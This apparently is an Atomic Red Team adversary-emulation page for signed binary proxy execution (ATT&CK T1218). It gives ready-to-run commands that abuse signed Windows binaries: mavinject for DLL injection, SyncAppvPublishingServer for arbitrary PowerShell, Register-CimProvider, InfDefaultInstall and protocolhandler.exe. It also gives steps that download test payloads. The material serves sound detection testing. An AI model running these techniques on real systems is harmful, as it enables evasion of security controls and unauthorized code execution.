Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.
-
Atomic Test #1 - mavinject - Inject DLL into running process
-
Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
-
Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| process_id | PID of process receiving injection | string | 1000 |
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll |
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}if (Test-Path #{dll_payload}) {exit 0} else {exit 1} New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |
SyncAppvPublishingServer.exe "n; #{powershell_code}"Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}if (Test-Path #{dll_payload}) {exit 0} else {exit 1} New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"Test execution of a .inf using InfDefaultInstall.exe
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf |
InfDefaultInstall.exe #{inf_to_execute}if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16 |
| remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx |
#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1} write-host "Install Microsoft Word or provide correct path."